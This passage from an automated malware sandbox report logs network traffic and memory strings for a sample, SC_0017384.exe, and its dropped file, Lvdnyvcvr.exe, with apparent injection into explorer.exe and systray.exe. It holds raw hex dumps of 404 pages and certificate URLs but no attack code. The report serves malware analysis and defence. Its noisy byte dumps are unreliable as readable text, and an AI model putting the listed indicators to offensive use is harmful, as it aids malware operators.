6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Mar 2023 08:11:38 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Tue, 21 Mar 2023 08:11:42 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:03 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=9fd82tovui4062jsi2krb883uj; expires=Tue, 21-Mar-2023 09:11:05 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KWaFRMSY0lCpPiDwf8DPuoaa0gu1Sb1Kcm8IfI25sJnbf5w3hc1ru9gPYcFjKOGzU60ooqcsEsBwFrc261uXwRK6O8iqCp6UGCkkqv2DM%2FuJG%2BATv00MSmQZDFv9Z0Mx7Yt4facPX%2F%2BwNWqW6fAZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba46084491e3-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 41 8b d4 40 10 85 ef fe 8a ba ed 65 26 d9 a8 2b 12 e3 80 08 b2 82 88 88 ee bd 92 ae a4 8b a9 74 85 ee ce 66 a3 f8 df a5 33 2e 9b 10 f6 60 9f 52 5d c5 f7 5e d7 23 95 8d bd 9c 5e 00 00 54 96 d0 5c 3e 97 32 72 14 3a 7d c3 8e e0 ab 46 f8 a4 a3 33 55 7e b9 7d 9a 0a 71 5e d7 e9 d4 6a e6 df 9b 9b 74 7a f4 1d bb f2 fa dd ae 33 a0 31 ec ba f2 d5 f5 f0 b0 ef b6 ea 62 59 bc 1c 1e f2 22 bb 81 5b 92 7b 8a dc e0 e1 83 67 94 c3 1d 79 83 0e 0f 01 5d 38 06 f2 dc 6e 09 7f 36 95 2d fe c7 57 52 3e 06 fe 45 e5 eb b7 cf 39 3b 4e c4 9d 8d a5 53 df a3 ec 67 84 1d 1d ed 65 66 4f d9 ba 0b d1 ab eb f6 0e 0d 87 41 70 2e d9 2d b4 5a b4 39 ef 95 26 36 d1 96 6f 6e 9e d7 a8 f2 55 58 55 fe 14 77 95 12 5b 65 6a 8b 5d ec b6 58 f5 87 6d de 3f 2c c1 90 e6 67 1d 01 3d 81 a8 9e d9 75 d0 aa 87 46 47 31 e0 34 42 4d d0 26 58 06 1f 2d 35 67 88 96 00 8d f1 14 02 d4 e8 37 c8 a8 40 2e 8c 7e 61 7a f8 f9 fd 0b 70 80 30 90 08 19 68 d4 7b 6a a2 cc 19 7c 6e 01 45 80 24 10 b4 c8 12 0e 8b 8b 06 dd 86 77 cf 81 23 24 94 d5 fe 9f 5b 8c 8b 05 61 77 86 9a 44 a7 6c b5 a9 d5 13 2b 04 eb a9 7d 7f 65 63 1c ca 3c 9f a6 29 eb d1 70 50 d7 e8 e8 e2 2c ec 1a 15 97 35 da e7 57 a7 bb 45 2a 91 6f 93 54 5a 64 95 e3 e3 d2 2f 9b ae f2 e5 b7 fb 0b 00 00 ff ff 03 00 16 97 a9 87 7d 03 00 00 0d 0a Data Ascii: 1a8A@e&+tf3.`R]^#^T\>2r:}F3U~}q^jtz31bY"[{gy]8n6-WR>E9;NSgefOAp.-Z9&6onUXUw[ej]Xm?,g=uFG14BM&X-5g7@.~azp0h{j|nE$w#$[awDl+}ec<)pP,5WE*oTZd/}
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:05 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: store_session=vcue9caqutq1egitp5nphb1rt3; expires=Tue, 21-Mar-2023 09:11:07 GMT; Max-Age=3600; path=/; SameSite=LaxVary: Accept-Encoding,User-AgentCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3zhXmDCjpuF5r%2Bb9vkduN0KPsoBeKDzLZNY3uaKncUAAqPX6SkIDrpdCezdg4FjjcIBL%2FNo4lSZYEpqmzFAP2h8MVNRFhOst32YstoJPL4qiU5v6bAiqgArzH4QLWvfQu6cu8Y6vH%2BC8E3DIy%2F6M"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba562b803a8e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 64 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 31 32 70 78 2f 31 2e 35 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6e 67 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 36 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c Data Ascii: 37d<html> <head> <title>Page Not Found</title> <style> body{ margin:0; padding:30px; font:12px/1.5 Helvetica,Arial,Verdana,sans-serif; } h1{ margin:0; font-size:48px; font-weight:normal; line-height:48px; } strong{ display:inline-block; width:65px; } </styl
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e6%2FEJDgHQjcuoYohdj0ra%2F4d26S7I%2F%2Bw3pN85cRgpRzvKvZ8TVLQZ1RwEuiccVevTyJQY4GtfAPWzseKtdfiDGgIup9D4IyI%2FBZWQiByR2tNVx7SRS3S28yavWbxfCbqlw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba77cf4a2c63-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 64 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 51 29 94 08 dc 03 47 83 17 b9 52 1b 1b 7b db 88 bf 47 49 85 c4 75 e6 cd 68 86 6e 9a 97 b5 7d ef 5b 78 b2 cf 1d f4 fb c7 6e bb 86 c5 2d e2 b6 b5 1b c4 c6 36 57 e7 ae aa 11 db dd 82 0d 05 3d 1d 99 82 38 cf 86 f4 a0 47 e1 55 bd 82 5d 54 d8 c4 f3 e0 09 af a2 21 9c 21 fa 88 fe 67 ca 2d f9 1f 13 96 6c 28 b1 0d 02 59 be cf 52 54 3c ec 5f 3b 18 5d 81 21 2a 7c 4d 1c c4 01 34 1c 0a 14 c9 17 c9 15 61 9a 9a 32 1b 72 de 67 29 85 1f 92 fb 0c 02 6f 33 00 4e 61 1c c7 ea 24 ea f4 52 b9 94 a0 8f 59 e1 be 26 fc 0b 18 c2 79 11 e1 fc c4 fc 02 00 00 ff ff 0d 0a Data Ascii: d4LN0Dw)j%hRQ)GR{GIuhn}[xn-6W=8GU]T!!g-l(YRT<_;]!*|M4a2rg)o3Na$RY&y
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Mar 2023 08:12:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j35Ko95Gih9X9oQzlqUwyxDva9uf6%2FviF1QglfgNtSZEGe%2BvokmHM1OjP7qIItQ6rs7MSbtjMUgDnP6CWLGU0vvNzD4P%2BxBg2jK05xN7S4tpFsO4Dhh6v4ufnjsHIFf0bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ab4ba87de882c3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 30 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 74 61 74 76 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.metatv.app Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 21 Mar 2023 08:11:52 GMTcontent-type: text/html; charset=utf-8content-length: 9503set-cookie: AWSALB=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/set-cookie: AWSALBCORS=bCn9G2/gZgmbFRD9758cwynOTqQ9E9t/stGP7SDkLHhiLlKmkgBG0zXzWTyo8dHMcfHREqVTDzkhoikFXH/7EtCcrVka7arDK0bLRf3pG/Q5UxjOrthD8ZihBL5P; Expires=Tue, 28 Mar 2023 08:11:52 GMT; Path=/; SameSite=Noneserver: Apachevary: X-Forwarded-Proto,Accept-Encoding,User-Agentset-cookie: session=fda0h9v5c31k27ncfm8cd5p2ff; path=/; domain=.brunaeleandro.com; secure; SameSite=Nonecontent-encoding: gzipconnection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 7d 5b 73 db c6 96 ee b3 fc 2b da 4c 6d 53 9a 10 20 2e c4 4d 12 ed 72 14 27 e3 94 7c 39 b6 93 7d 66 ab 5c ac 26 d1 24 61 83 00 03 80 ba 24 f1 8f d9 35 0f 53 73 aa e6 e9 d4 79 39 8f c7 7f ec 7c ab 71 21 40 82 12 95 38 79 18 c5 91 80 46 f7 ea 75 5f ab 2f 68 9c 3e fc f6 d5 d9 bb 7f 7b fd 8c cd b3 45 f8 f8 c1 69 fe 87 b1 d3 b9 e0 3e 5d e0 72 21 32 8e e7 d9 52 11 3f af 82 cb 61 e7 2c 8e 32 11 65 ca bb 9b a5 e8 b0 49 7e 37 ec 64 e2 3a eb 13 80 13 36 99 f3 24 15 d9 70 95 4d 15 b7 c3 fa 12 64 18 44 1f 59 22 c2 61 27 9d c7 49 36 59 65 2c 40 e3 0e 9b 27 62 3a ec f4 fb 13 3f 52 78 8a 76 a9 12 8a 19 9f dc a8 13 9e f2 44 9d c4 8b fe 94 5f 52 65 15 bf 9e 5c 0e 0d 09 f3 34 0b b2 50 3c 7e fd f9 9f b3 20 e2 2c fa fc ef 31 13 11 e1 93 70 9f b3 df d8 59 d9 fc b4 9f 57 7d 90 13 13 f1 85 18 76 2e 03 71 b5 04 22 35 12 ae 02 3f 9b 0f 7d 81 be 84 22 6f 7a 2c 88 82 2c e0 a1 92 4e 78 28 86 ba aa 75 1e 3f 78 50 b2 25 87 34 8b e3 59 28 94 34 c8 84 72 29 92 60 1a 4c 78 16 10 69 15 e4 ef 5f 5c 67 8b 6f ff 1e 3c 7d 75 a9 bc 5d 0d 7e f1 94 f4 c7 a7 37 3f fc f0 f2 c7 ef b3 70 7e f3 d3 37 2f 56 df 70 f3 4c 9f fe 9c 4a da a8 87 74 92 04 cb 8c a5 c9 64 d8 21 fe a7 c7 fd fe 38 51 01 4f 24 cb 24 48 85 7a 15 8c 53 62 4a dc 1f f3 28 12 89 fa 21 7d 42 58 3c f7 87 8e 6b 69 9e d0 34 c5 b1 1d 5f 19 98 86 ad 78 96 e1 29 53 cd b7 0c 73 e2 ea a6 33 e9 3c 3e ed e7 9d a0 c3 07 ad fd 89 c5 58 f8 6a 06 49 4f e3 64 21 45 91 17 7d 48 1b ad 4f 1f 2a 0a fb d7 77 2f ce 2d f6 76 1e 2c 18 8f 7c f6 46 a4 cb 38 a2 aa ec f9 33 97 a5 ab 25 b1 9b c5 d3 a2 a2 08 c5 02 c4 a4 b2 f2 42 f8 01 67 3f af c0 3e 91 32 45 79 2c 41 5e 04 53 16 66 68 ce bc f7 Data Ascii: }[s+LmS .Mr'|9}f\&$a$5Ssy9|q!@8yFu_/h>{Ei>]r!2R?a,2eI~7d:6$pMdDY"a'I6Ye,@'b:?RxvD_Re\4P<~ ,1pYW}v.q"5?}"oz,,Nx(u?xP%4Y(4r)`Lxi_\go<}u]~7?p~7/VpLJtd!8QO$$HzSbJ(!}BX<ki4_x)Ss3<>XjIOd!E}HO*w/-v,|F83%Bg?>2Ey,A^Sfh
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
          Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
